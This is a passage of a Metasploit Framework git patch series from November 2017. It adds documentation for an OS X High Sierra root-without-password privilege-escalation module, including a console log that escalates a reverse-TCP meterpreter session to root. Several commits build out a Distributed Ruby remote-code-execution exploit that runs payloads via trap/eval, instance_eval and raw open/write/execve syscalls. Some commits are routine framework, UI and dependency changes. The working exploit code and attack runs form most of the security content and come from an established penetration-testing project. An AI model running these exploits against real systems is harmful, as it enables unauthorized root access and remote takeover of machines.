0000000000..31162807ca --- /dev/null +++ b/documentation/modules/exploit/osx/local/root_no_password.md @@ -0,0 +1,104 @@ +## Vulnerable Application +This vulnerability works against OSX 10.13 (High Sierra). Early +research (https://objective-see.com/blog/blog_0x24.html) suggests that +the vulnerability is the result of multiple errors ultimately started by +an incorrect return value from triggered by the funtion +`od_verify_crypt_password` rteturning true even if the account is +disabled. The subsequent function calls appear to alidate and create +the password, though there is still a lot of research into the bug and +these results should be verified once more research has been published. + +## Verification Steps +1. Get a session on a vulnerable system +2. `use exploit/osx/local/root_no_password` +3. `set lhost ` +4. `set lport ` +5. `set session ` +6. `run` + +## Scenarios +### Example Run +``` +msf exploit(psexec) > use exploit/multi/handler +msf exploit(handler) > set payload osx/x64/meterpreter_reverse_tcp +payload => osx/x64/meterpreter_reverse_tcp +msf exploit(handler) > set lhost +lhost => +msf exploit(handler) > set lport 4567 +lport => 4567 +msf exploit(handler) > run + +[*] Started reverse TCP handler on :4567 +httpserver[*] Meterpreter session 1 opened (:4567 -> :49347) at 2017-11-29 07:28:32 -0600 + +meterpreter > sysinfo +Computer : msfusers-Mac.local +OS : (MacOSX 17.0.0) +Architecture : x64 +Meterpreter : x64/osx +meterpreter > getuid +Server username: uid=501, gid=20, euid=501, egid=20 +meterpreter > background +[*] Backgrounding session 1... +msf exploit(handler) > use exploit/osx/local/root_no_password +msf exploit(root_no_password) > show options + +Module options (exploit/osx/local/root_no_password): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + SESSION yes The session to run this module on. + + +Payload options (osx/x64/meterpreter_reverse_tcp): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + LHOST yes The listen address + LPORT 4444 yes The listen port + + +Exploit target: + + Id Name + -- ---- + 0 Mac OS X 10.13.1 High Sierra x64 (Native Payload) + + +msf exploit(root_no_password) > set lhost +lhost => +msf exploit(root_no_password) > set lport 4562 +lport => 4562 +msf exploit(root_no_password) > set session 1 +session => 1 +msf exploit(root_no_password) > run + +[*] Started reverse TCP handler on :4562 +[*] Writing payload file as '/tmp/cinbvsmrmyxw' +[*] Meterpreter session 2 opened (:4562 -> :62522) at 2017-11-29 07:29:56 -0600 +[*] - Meterpreter session 2 closed. Reason: Died + + +[*] Executing payload file as '/tmp/cinbvsmrmyxw' +[!] This exploit may require manual cleanup of '/tmp/cinbvsmrmyxw' on the target + +[-] Invalid session identifier: 2 +msf exploit(root_no_password) > +msf exploit(root_no_password) > +msf exploit(root_no_password) > run + +[*] Started reverse TCP handler on :4562 +[*] Writing payload file as '/tmp/imtjkakowanv' +[*] Executing payload file as '/tmp/imtjkakowanv' +[*] Meterpreter session 3 opened (:4562 -> :49348) at 2017-11-29 07:30:53 -0600 +[+] Deleted /tmp/imtjkakowanv + +meterpreter > sysinfo +Computer : msfusers-Mac.local +OS : (MacOSX 17.0.0) +Architecture : x64 +Meterpreter : x64/osx +meterpreter > getuid +Server username: uid=0, gid=20, euid=0, egid=20 +meterpreter > +``` From 9dc3d60fc286597f282857f9be747b821a6632ec Mon Sep 17 00:00:00 2001 From: bwatters-r7 Date: Wed, 29 Nov 2017 10:29:38 -0600 Subject: [PATCH 220/254] Stupid Typos --- documentation/modules/exploit/osx/local/root_no_password.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/documentation/modules/exploit/osx/local/root_no_password.md b/documentation/modules/exploit/osx/local/root_no_password.md index 31162807ca..ac793fa6fa 100644 --- a/documentation/modules/exploit/osx/local/root_no_password.md +++ b/documentation/modules/exploit/osx/local/root_no_password.md @@ -2,9 +2,9 @@ This vulnerability works against OSX 10.13 (High Sierra). Early research (https://objective-see.com/blog/blog_0x24.html) suggests that the vulnerability is the result of multiple errors ultimately started by -an incorrect return value from triggered by the funtion -`od_verify_crypt_password` rteturning true even if the account is -disabled. The subsequent function calls appear to alidate and create +an incorrect return value from triggered by the function +`od_verify_crypt_password` returning true even if the account is +disabled. The subsequent function calls appear to validate and create the password, though there is still a lot of research into the bug and these results should be verified once more research has been published. From 8051f790d0cbf8bd7310fabce692a3d686d0c9a7 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Tue, 14 Nov 2017 20:13:35 -0600 Subject: [PATCH 221/254] if there is info in the uuid_db, put it in payload_uuid automatically --- lib/msf/core/handler.rb | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/lib/msf/core/handler.rb b/lib/msf/core/handler.rb index 70b60081e0..902e674aad 100644 --- a/lib/msf/core/handler.rb +++ b/lib/msf/core/handler.rb @@ -222,7 +222,13 @@ protected s.set_from_exploit(assoc_exploit) # Pass along any associated payload uuid if specified - s.payload_uuid = opts[:payload_uuid] if opts[:payload_uuid] + if opts[:payload_uuid] + s.payload_uuid = opts[:payload_uuid] + if s.payload_uuid.respond_to?(:puid_hex) && (uuid_info = framework.uuid_db[sess_puid]) + s.payload_uuid.name = uuid_info['name'] + s.payload_uuid.timestamp = uuid_info['timestamp'] + end + end # If the session is valid, register it with the framework and # notify any waiters we may have. From 59446f3d961ef29ac358ac5d873785185f0156ad Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Tue, 14 Nov 2017 20:15:51 -0600 Subject: [PATCH 222/254] change ui to use new settings --- lib/msf/base/serializer/readable_text.rb | 6 +++--- lib/msf/core/handler.rb | 3 +++ 2 files changed, 6 insertions(+), 3 deletions(-) diff --git a/lib/msf/base/serializer/readable_text.rb b/lib/msf/base/serializer/readable_text.rb index 1c170f8ce6..00b39824a9 100644 --- a/lib/msf/base/serializer/readable_text.rb +++ b/lib/msf/base/serializer/readable_text.rb @@ -652,10 +652,10 @@ class ReadableText sess_checkin = "#{(Time.now.to_i - session.last_checkin.to_i)}s ago @ #{session.last_checkin.to_s}" end - if session.payload_uuid.respond_to?(:puid_hex) && (uuid_info = framework.uuid_db[sess_puid]) + if session.payload_uuid.registered sess_registration = "Yes" - if uuid_info['name'] - sess_registration << " - Name=\"#{uuid_info['name']}\"" + if session.payload_uuid.name + sess_registration << " - Name=\"#{session.payload_uuid.name}\"" end end diff --git a/lib/msf/core/handler.rb b/lib/msf/core/handler.rb index 902e674aad..6f4e0a6888 100644 --- a/lib/msf/core/handler.rb +++ b/lib/msf/core/handler.rb @@ -225,8 +225,11 @@ protected if opts[:payload_uuid] s.payload_uuid = opts[:payload_uuid] if s.payload_uuid.respond_to?(:puid_hex) && (uuid_info = framework.uuid_db[sess_puid]) + s.payload_uuid.registered = true s.payload_uuid.name = uuid_info['name'] s.payload_uuid.timestamp = uuid_info['timestamp'] + else + s.payload_uuid.registered = false end end From 446f3fa675eb0e0fb7f23ab1e5b49dba4fa8651d Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Tue, 14 Nov 2017 20:21:38 -0600 Subject: [PATCH 223/254] more conversions --- lib/msf/base/serializer/readable_text.rb | 1 - lib/msf/core/handler.rb | 2 +- 2 files changed, 1 insertion(+), 2 deletions(-) diff --git a/lib/msf/base/serializer/readable_text.rb b/lib/msf/base/serializer/readable_text.rb index 00b39824a9..27fc80f110 100644 --- a/lib/msf/base/serializer/readable_text.rb +++ b/lib/msf/base/serializer/readable_text.rb @@ -634,7 +634,6 @@ class ReadableText sess_via = session.via_exploit.to_s sess_type = session.type.to_s sess_uuid = session.payload_uuid.to_s - sess_puid = session.payload_uuid.respond_to?(:puid_hex) ? session.payload_uuid.puid_hex : nil sess_luri = session.exploit_datastore['LURI'] || "" if session.exploit_datastore sess_enc = false if session.respond_to?(:tlv_enc_key) && session.tlv_enc_key && session.tlv_enc_key[:key] diff --git a/lib/msf/core/handler.rb b/lib/msf/core/handler.rb index 6f4e0a6888..96f3fe56b4 100644 --- a/lib/msf/core/handler.rb +++ b/lib/msf/core/handler.rb @@ -224,7 +224,7 @@ protected # Pass along any associated payload uuid if specified if opts[:payload_uuid] s.payload_uuid = opts[:payload_uuid] - if s.payload_uuid.respond_to?(:puid_hex) && (uuid_info = framework.uuid_db[sess_puid]) + if s.payload_uuid.respond_to?(:puid_hex) && (uuid_info = framework.uuid_db[session.payload_uuid.puid_hex]) s.payload_uuid.registered = true s.payload_uuid.name = uuid_info['name'] s.payload_uuid.timestamp = uuid_info['timestamp'] From ec2b5d48a652f0758aaf338d88721118eb12555a Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Wed, 15 Nov 2017 20:54:28 -0600 Subject: [PATCH 224/254] add missing payload uuid accessors --- lib/msf/core/payload/uuid.rb | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/lib/msf/core/payload/uuid.rb b/lib/msf/core/payload/uuid.rb index 1a651242e3..f510c88469 100644 --- a/lib/msf/core/payload/uuid.rb +++ b/lib/msf/core/payload/uuid.rb @@ -254,6 +254,10 @@ class Msf::Payload::UUID self.xor1 = opts[:xor1] self.xor2 = opts[:xor2] + self.timestamp = nil + self.name = nil + self.registered = false + if opts[:seed] self.puid = self.class.seed_to_puid(opts[:seed]) end @@ -367,6 +371,10 @@ class Msf::Payload::UUID self end + attr_accessor :registered + attr_accessor :timestamp + attr_accessor :name + attr_reader :arch attr_reader :platform From 70ec576d52f36eab29248bc93692742c5ef3c7a7 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Wed, 29 Nov 2017 11:53:56 -0600 Subject: [PATCH 225/254] use correct session variable --- lib/msf/core/handler.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/handler.rb b/lib/msf/core/handler.rb index 96f3fe56b4..24d882aad1 100644 --- a/lib/msf/core/handler.rb +++ b/lib/msf/core/handler.rb @@ -224,7 +224,7 @@ protected # Pass along any associated payload uuid if specified if opts[:payload_uuid] s.payload_uuid = opts[:payload_uuid] - if s.payload_uuid.respond_to?(:puid_hex) && (uuid_info = framework.uuid_db[session.payload_uuid.puid_hex]) + if s.payload_uuid.respond_to?(:puid_hex) && (uuid_info = framework.uuid_db[s.payload_uuid.puid_hex]) s.payload_uuid.registered = true s.payload_uuid.name = uuid_info['name'] s.payload_uuid.timestamp = uuid_info['timestamp'] From 174d0d46de9749722a0ffabbababada27d047959 Mon Sep 17 00:00:00 2001 From: Metasploit Date: Wed, 29 Nov 2017 10:45:55 -0800 Subject: [PATCH 226/254] Bump version of framework to 4.16.21 --- Gemfile.lock | 8 ++++---- lib/metasploit/framework/version.rb | 2 +- 2 files changed, 5 insertions(+), 5 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index 6a6c15923e..fdd9aed9fd 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -1,7 +1,7 @@ PATH remote: . specs: - metasploit-framework (4.16.20) + metasploit-framework (4.16.21) actionpack (~> 4.2.6) activerecord (~> 4.2.6) activesupport (~> 4.2.6) @@ -249,7 +249,7 @@ GEM ffi rbnacl-libsodium (1.0.15.1) rbnacl (>= 3.0.1) - recog (2.1.16) + recog (2.1.17) nokogiri redcarpet (3.4.0) rex-arch (0.1.13) @@ -265,7 +265,7 @@ GEM metasm rex-arch rex-text - rex-exploitation (0.1.15) + rex-exploitation (0.1.16) jsobfu metasm rex-arch @@ -357,7 +357,7 @@ GEM activemodel (>= 4.2.7) activesupport (>= 4.2.7) xmlrpc (0.3.0) - yard (0.9.11) + yard (0.9.12) PLATFORMS ruby diff --git a/lib/metasploit/framework/version.rb b/lib/metasploit/framework/version.rb index 7e90de291c..9ae49f17d5 100644 --- a/lib/metasploit/framework/version.rb +++ b/lib/metasploit/framework/version.rb @@ -30,7 +30,7 @@ module Metasploit end end - VERSION = "4.16.20" + VERSION = "4.16.21" MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i } PRERELEASE = 'dev' HASH = get_hash From edb2d8b762971bdf5e4e11fa9f3def71e152197f Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Wed, 29 Nov 2017 17:01:01 -0600 Subject: [PATCH 227/254] fix windows unicode usernames, add recursive directory delete --- Gemfile.lock | 4 ++-- metasploit-framework.gemspec | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index fdd9aed9fd..a507211199 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -17,7 +17,7 @@ PATH metasploit-concern metasploit-credential metasploit-model - metasploit-payloads (= 1.3.17) + metasploit-payloads (= 1.3.18) metasploit_data_models metasploit_payloads-mettle (= 0.2.8) msgpack @@ -178,7 +178,7 @@ GEM activemodel (~> 4.2.6) activesupport (~> 4.2.6) railties (~> 4.2.6) - metasploit-payloads (1.3.17) + metasploit-payloads (1.3.18) metasploit_data_models (2.0.15) activerecord (~> 4.2.6) activesupport (~> 4.2.6) diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index cb469296e6..177deef087 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -70,7 +70,7 @@ Gem::Specification.new do |spec| # are needed when there's no database spec.add_runtime_dependency 'metasploit-model' # Needed for Meterpreter - spec.add_runtime_dependency 'metasploit-payloads', '1.3.17' + spec.add_runtime_dependency 'metasploit-payloads', '1.3.18' # Needed for the next-generation POSIX Meterpreter spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.2.8' # Needed by msfgui and other rpc components From e5a5d35ad8cb12b0b1238d6b662380f348b9b5bb Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Wed, 29 Nov 2017 18:17:30 -0600 Subject: [PATCH 228/254] add 'promptname' that expands the module path a bit more This allows the user to actually see the module context. --- lib/msf/core/module/full_name.rb | 18 +++++++++++++++--- lib/msf/ui/console/command_dispatcher/core.rb | 2 +- .../ui/console/command_dispatcher/modules.rb | 2 +- 3 files changed, 17 insertions(+), 5 deletions(-) diff --git a/lib/msf/core/module/full_name.rb b/lib/msf/core/module/full_name.rb index c1b2d5b755..a6162299ea 100644 --- a/lib/msf/core/module/full_name.rb +++ b/lib/msf/core/module/full_name.rb @@ -24,6 +24,11 @@ module Msf::Module::FullName type + '/' + refname end + def promptname + elements = refname.split('/') + "#{elements[-2]}/#{elements[-1]}" + end + def shortname refname.split('/').last end @@ -55,9 +60,16 @@ module Msf::Module::FullName end # - # Returns the module's framework short name. This is a - # possibly conflicting name used for things like console - # prompts. + # Returns the module's framework prompt-friendly name. + # + # reverse_tcp + # + def promptname + self.class.promptname + end + + # + # Returns the module's framework short name. # # reverse_tcp # diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index 78a8443412..85cd12da4a 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -1107,7 +1107,7 @@ class Core if active_module # intentionally += and not << because we don't want to modify # datastore or the constant DefaultPrompt - prompt += " #{active_module.type}(%bld%red#{active_module.shortname}%clr)" + prompt += " #{active_module.type}(%bld%red#{active_module.promptname}%clr)" end prompt_char = framework.datastore['PromptChar'] || Msf::Ui::Console::Driver::DefaultPromptChar driver.update_prompt("#{prompt} ", prompt_char, true) diff --git a/lib/msf/ui/console/command_dispatcher/modules.rb b/lib/msf/ui/console/command_dispatcher/modules.rb index bbb1993c29..6238599397 100644 --- a/lib/msf/ui/console/command_dispatcher/modules.rb +++ b/lib/msf/ui/console/command_dispatcher/modules.rb @@ -661,7 +661,7 @@ module Msf # Update the command prompt prompt = framework.datastore['Prompt'] || Msf::Ui::Console::Driver::DefaultPrompt prompt_char = framework.datastore['PromptChar'] || Msf::Ui::Console::Driver::DefaultPromptChar - driver.update_prompt("#{prompt} #{mod.type}(%bld%red#{mod.shortname}%clr) ", prompt_char, true) + driver.update_prompt("#{prompt} #{mod.type}(%bld%red#{mod.promptname}%clr) ", prompt_char, true) end # From c848379ecbcd259190e7b6e8891573b6dc73664b Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Wed, 29 Nov 2017 20:52:14 -0600 Subject: [PATCH 229/254] simply use refname in the prompt? --- lib/msf/core/module/full_name.rb | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/lib/msf/core/module/full_name.rb b/lib/msf/core/module/full_name.rb index a6162299ea..ecc6f3852b 100644 --- a/lib/msf/core/module/full_name.rb +++ b/lib/msf/core/module/full_name.rb @@ -25,8 +25,7 @@ module Msf::Module::FullName end def promptname - elements = refname.split('/') - "#{elements[-2]}/#{elements[-1]}" + refname end def shortname From 59580195b441a459692e265b8d18c3c0b9e2410b Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Thu, 30 Nov 2017 05:46:03 -0600 Subject: [PATCH 230/254] resurrect old methods, try all 3 --- .../linux/misc/drb_remote_codeexec.rb | 74 ++++++++++++++++--- 1 file changed, 62 insertions(+), 12 deletions(-) diff --git a/modules/exploits/linux/misc/drb_remote_codeexec.rb b/modules/exploits/linux/misc/drb_remote_codeexec.rb index b4c8577fef..f58d96c9e2 100644 --- a/modules/exploits/linux/misc/drb_remote_codeexec.rb +++ b/modules/exploits/linux/misc/drb_remote_codeexec.rb @@ -8,6 +8,8 @@ require 'drb/drb' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking + include Msf::Exploit::FileDropper + def initialize(info = {}) super(update_info(info, 'Name' => 'Distributed Ruby Remote Code Execution', @@ -43,26 +45,74 @@ class MetasploitModule < Msf::Exploit::Remote ]) end + def method_trap(p) + p.send(:trap, 23, + :"class Object\ndef my_eval(str)\nsystem(str.untaint)\nend\nend") + p.send(:my_eval, payload.encoded) + end + + def method_instance_eval(p) + p.send(:instance_eval,"Kernel.fork { `#{payload.encoded}` }") + end + + def method_syscall(p) + filename = "." + Rex::Text.rand_text_alphanumeric(16) + + begin + # syscall to decide wether it's 64 or 32 bit: + # it's getpid on 32bit which will succeed, and writev on 64bit + # which will fail due to missing args + j = p.send(:syscall, 20) + # syscall open + i = p.send(:syscall, 8, filename, 0700) + # syscall write + p.send(:syscall, 4, i, "#!/bin/sh\n" << payload.encoded,payload.encoded.length + 10) + # syscall close + p.send(:syscall, 6, i) + # syscall fork + p.send(:syscall, 2) + # syscall execve + p.send(:syscall, 11, filename, 0, 0) + + # likely 64bit system + rescue Errno::EBADF + # syscall creat + i = p.send(:syscall,85,filename,0700) + # syscall write + p.send(:syscall,1,i,"#!/bin/sh\n" << payload.encoded,payload.encoded.length + 10) + # syscall close + p.send(:syscall,3,i) + # syscall fork + p.send(:syscall,57) + # syscall execve + p.send(:syscall,59,filename,0,0) + end + + register_file_for_cleanup(filename) if filename + #print_status("payload executed from file #{filename}") unless filename.nil? + #print_status("make sure to remove that file") unless filename.nil? + end + def exploit serveruri = datastore['URI'] + DRb.start_service p = DRbObject.new_with_uri(serveruri) class << p undef :send end - p.send(:trap, 23, :"class Object\ndef my_eval(str)\nsystem(str.untaint)\nend\nend") - # syscall to decide whether it's 64 or 32 bit: - # it's getpid on 32bit which will succeed, and writev on 64bit - # which will fail due to missing args - begin - pid = p.send(:syscall, 20) - p.send(:syscall, 37, pid, 23) - rescue Errno::EBADF - # 64 bit system - pid = p.send(:syscall, 39) - p.send(:syscall, 62, pid, 23) + methods = ["instance_eval", "syscall", "trap"] + methods.each do |method| + begin + print_status("trying to exploit #{method}") + send("method_" + method, p) + handler(nil) + break + rescue SecurityError => e + print_error("target is not vulnerable to #{method}") + end end - p.send(:my_eval, payload.encoded) + end end From 5da34e8f2bf0b14449ff46ba13a0bd0b67242c4b Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Thu, 30 Nov 2017 06:36:42 -0600 Subject: [PATCH 231/254] support RHOST/RPORT --- modules/exploits/linux/misc/drb_remote_codeexec.rb | 11 +++++++++-- 1 file changed, 9 insertions(+), 2 deletions(-) diff --git a/modules/exploits/linux/misc/drb_remote_codeexec.rb b/modules/exploits/linux/misc/drb_remote_codeexec.rb index f58d96c9e2..b42bfb6eb7 100644 --- a/modules/exploits/linux/misc/drb_remote_codeexec.rb +++ b/modules/exploits/linux/misc/drb_remote_codeexec.rb @@ -41,7 +41,10 @@ class MetasploitModule < Msf::Exploit::Remote register_options( [ - OptString.new('URI', [true, "The dRuby URI of the target host (druby://host:port)", ""]), + OptString.new('URI', + "The URI of the target host (druby://host:port) (overrides RHOST/RPORT)"), + Opt::RHOST(nil, false), + Opt::RPORT(8787) ]) end @@ -94,7 +97,11 @@ class MetasploitModule < Msf::Exploit::Remote end def exploit - serveruri = datastore['URI'] + unless datastore['URI'].blank? + serveruri = datastore['URI'] + else + serveruri = "druby://#{datastore['RHOST']}:#{datastore['RPORT']}" + end DRb.start_service p = DRbObject.new_with_uri(serveruri) From 9f12b794da2c633377c3a15306b3547d374cca64 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Thu, 30 Nov 2017 06:37:04 -0600 Subject: [PATCH 232/254] cleanup comments --- .../exploits/linux/misc/drb_remote_codeexec.rb | 18 +++++++++--------- 1 file changed, 9 insertions(+), 9 deletions(-) diff --git a/modules/exploits/linux/misc/drb_remote_codeexec.rb b/modules/exploits/linux/misc/drb_remote_codeexec.rb index b42bfb6eb7..b0c1385c51 100644 --- a/modules/exploits/linux/misc/drb_remote_codeexec.rb +++ b/modules/exploits/linux/misc/drb_remote_codeexec.rb @@ -62,9 +62,9 @@ class MetasploitModule < Msf::Exploit::Remote filename = "." + Rex::Text.rand_text_alphanumeric(16) begin - # syscall to decide wether it's 64 or 32 bit: - # it's getpid on 32bit which will succeed, and writev on 64bit - # which will fail due to missing args + # Decide if this is running on an x86 or x64 target. + # This syscall number is getpid on x86, which will succeed, + # or writev on x64, which will fail due to missing args. j = p.send(:syscall, 20) # syscall open i = p.send(:syscall, 8, filename, 0700) @@ -77,18 +77,18 @@ class MetasploitModule < Msf::Exploit::Remote # syscall execve p.send(:syscall, 11, filename, 0, 0) - # likely 64bit system + # likely x64 rescue Errno::EBADF # syscall creat - i = p.send(:syscall,85,filename,0700) + i = p.send(:syscall, 85, filename, 0700) # syscall write - p.send(:syscall,1,i,"#!/bin/sh\n" << payload.encoded,payload.encoded.length + 10) + p.send(:syscall, 1, i, "#!/bin/sh\n" << payload.encoded,payload.encoded.length + 10) # syscall close - p.send(:syscall,3,i) + p.send(:syscall, 3, i) # syscall fork - p.send(:syscall,57) + p.send(:syscall, 57) # syscall execve - p.send(:syscall,59,filename,0,0) + p.send(:syscall, 59, filename, 0, 0) end register_file_for_cleanup(filename) if filename From eea72663b35cc1e1dfe0dd3372cb091c5603c248 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Thu, 30 Nov 2017 06:37:21 -0600 Subject: [PATCH 233/254] warn on method failure instead of error --- modules/exploits/linux/misc/drb_remote_codeexec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/misc/drb_remote_codeexec.rb b/modules/exploits/linux/misc/drb_remote_codeexec.rb index b0c1385c51..aa82cb320b 100644 --- a/modules/exploits/linux/misc/drb_remote_codeexec.rb +++ b/modules/exploits/linux/misc/drb_remote_codeexec.rb @@ -117,7 +117,7 @@ class MetasploitModule < Msf::Exploit::Remote handler(nil) break rescue SecurityError => e - print_error("target is not vulnerable to #{method}") + print_warning("target is not vulnerable to #{method}") end end From a0e0e1db15fd4b7d6abd5471c9f88d76fb0fd235 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Thu, 30 Nov 2017 07:51:12 -0600 Subject: [PATCH 234/254] allow manual targeting, handle errors better --- .../exploits/linux/misc/drb_remote_codeexec.rb | 16 +++++++++++++--- 1 file changed, 13 insertions(+), 3 deletions(-) diff --git a/modules/exploits/linux/misc/drb_remote_codeexec.rb b/modules/exploits/linux/misc/drb_remote_codeexec.rb index aa82cb320b..dc805981e2 100644 --- a/modules/exploits/linux/misc/drb_remote_codeexec.rb +++ b/modules/exploits/linux/misc/drb_remote_codeexec.rb @@ -33,7 +33,10 @@ class MetasploitModule < Msf::Exploit::Remote 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Targets' => [ - ['Automatic', {}], + ['Automatic', { method: 'auto'}], + ['Trap', { method: 'trap'}], + ['Eval', { method: 'instance_eval'}], + ['Syscall', { method: 'syscall'}], ], 'DisclosureDate' => 'Mar 23 2011', 'DefaultTarget' => 0)) @@ -76,6 +79,7 @@ class MetasploitModule < Msf::Exploit::Remote p.send(:syscall, 2) # syscall execve p.send(:syscall, 11, filename, 0, 0) + print_status("attempting x86 execve of #{filename}") # likely x64 rescue Errno::EBADF @@ -89,6 +93,7 @@ class MetasploitModule < Msf::Exploit::Remote p.send(:syscall, 57) # syscall execve p.send(:syscall, 59, filename, 0, 0) + print_status("attempting x64 execve of #{filename}") end register_file_for_cleanup(filename) if filename @@ -109,14 +114,19 @@ class MetasploitModule < Msf::Exploit::Remote undef :send end - methods = ["instance_eval", "syscall", "trap"] + if target[:method] == 'auto' + methods = ["instance_eval", "syscall", "trap"] + else + methods = [target[:method]] + end + methods.each do |method| begin print_status("trying to exploit #{method}") send("method_" + method, p) handler(nil) break - rescue SecurityError => e + rescue SecurityError, DRb::DRbConnError, NoMethodError print_warning("target is not vulnerable to #{method}") end end From 87e683c7634f0bb7018ae1a72dcd7214f918d70b Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Thu, 30 Nov 2017 08:12:15 -0600 Subject: [PATCH 235/254] add back kill syscall for trap method --- modules/exploits/linux/misc/drb_remote_codeexec.rb | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/modules/exploits/linux/misc/drb_remote_codeexec.rb b/modules/exploits/linux/misc/drb_remote_codeexec.rb index dc805981e2..ca6b34f4c3 100644 --- a/modules/exploits/linux/misc/drb_remote_codeexec.rb +++ b/modules/exploits/linux/misc/drb_remote_codeexec.rb @@ -41,7 +41,6 @@ class MetasploitModule < Msf::Exploit::Remote 'DisclosureDate' => 'Mar 23 2011', 'DefaultTarget' => 0)) - register_options( [ OptString.new('URI', @@ -54,6 +53,15 @@ class MetasploitModule < Msf::Exploit::Remote def method_trap(p) p.send(:trap, 23, :"class Object\ndef my_eval(str)\nsystem(str.untaint)\nend\nend") + # Decide if this is running on an x86 or x64 target, using the kill(2) syscall + begin + pid = p.send(:syscall, 20) + p.send(:syscall, 37, pid, 23) + rescue Errno::EBADF + # 64 bit system + pid = p.send(:syscall, 39) + p.send(:syscall, 62, pid, 23) + end p.send(:my_eval, payload.encoded) end From d689b33d7edc6baddb5280bffa48e04caad2b764 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Thu, 30 Nov 2017 08:31:13 -0600 Subject: [PATCH 236/254] more error handling, deal with user error --- .../exploits/linux/misc/drb_remote_codeexec.rb | 17 +++++++++++++---- 1 file changed, 13 insertions(+), 4 deletions(-) diff --git a/modules/exploits/linux/misc/drb_remote_codeexec.rb b/modules/exploits/linux/misc/drb_remote_codeexec.rb index ca6b34f4c3..5c7515cef3 100644 --- a/modules/exploits/linux/misc/drb_remote_codeexec.rb +++ b/modules/exploits/linux/misc/drb_remote_codeexec.rb @@ -43,8 +43,7 @@ class MetasploitModule < Msf::Exploit::Remote register_options( [ - OptString.new('URI', - "The URI of the target host (druby://host:port) (overrides RHOST/RPORT)"), + OptString.new('URI', [false, "The URI of the target host (druby://host:port) (overrides RHOST/RPORT)", nil]), Opt::RHOST(nil, false), Opt::RPORT(8787) ]) @@ -110,6 +109,16 @@ class MetasploitModule < Msf::Exploit::Remote end def exploit + if !datastore['URI'].blank? && !datastore['RHOST'].blank? + print_error("URI and RHOST are specified, unset one") + return + end + + if datastore['URI'].blank? && datastore['RHOST'].blank? + print_error("neither URI nor RHOST are specified, set one") + return + end + unless datastore['URI'].blank? serveruri = datastore['URI'] else @@ -130,12 +139,12 @@ class MetasploitModule < Msf::Exploit::Remote methods.each do |method| begin - print_status("trying to exploit #{method}") + print_status("Trying to exploit #{method} method") send("method_" + method, p) handler(nil) break rescue SecurityError, DRb::DRbConnError, NoMethodError - print_warning("target is not vulnerable to #{method}") + print_warning("Target is not vulnerable to #{method} method") end end From c288dab338424237d364ac1cb9bfc28f8e0d3dad Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Thu, 30 Nov 2017 10:51:02 -0600 Subject: [PATCH 237/254] fixup RHOST/RPORT expectations if only URI is set --- modules/exploits/linux/misc/drb_remote_codeexec.rb | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/modules/exploits/linux/misc/drb_remote_codeexec.rb b/modules/exploits/linux/misc/drb_remote_codeexec.rb index 5c7515cef3..8eedfe4403 100644 --- a/modules/exploits/linux/misc/drb_remote_codeexec.rb +++ b/modules/exploits/linux/misc/drb_remote_codeexec.rb @@ -104,8 +104,6 @@ class MetasploitModule < Msf::Exploit::Remote end register_file_for_cleanup(filename) if filename - #print_status("payload executed from file #{filename}") unless filename.nil? - #print_status("make sure to remove that file") unless filename.nil? end def exploit @@ -121,6 +119,7 @@ class MetasploitModule < Msf::Exploit::Remote unless datastore['URI'].blank? serveruri = datastore['URI'] + (datastore['RHOST'], datastore['RPORT']) = serveruri.sub(/druby:\/\//i, '').split(':') else serveruri = "druby://#{datastore['RHOST']}:#{datastore['RPORT']}" end From 09dd5b84890488e912144ecedeb0597d6d72eafd Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Thu, 30 Nov 2017 10:51:21 -0600 Subject: [PATCH 238/254] fix check command to not require an rport _method_ --- lib/msf/ui/console/module_command_dispatcher.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/lib/msf/ui/console/module_command_dispatcher.rb b/lib/msf/ui/console/module_command_dispatcher.rb index 7f378440cc..7064ce6e83 100644 --- a/lib/msf/ui/console/module_command_dispatcher.rb +++ b/lib/msf/ui/console/module_command_dispatcher.rb @@ -209,10 +209,10 @@ module ModuleCommandDispatcher end rhost = instance.datastore['RHOST'] - rport = nil + rport = instance.datastore['RPORT'] peer = rhost - if instance.datastore['rport'] - rport = instance.rport + if rport + rport = instance.rport 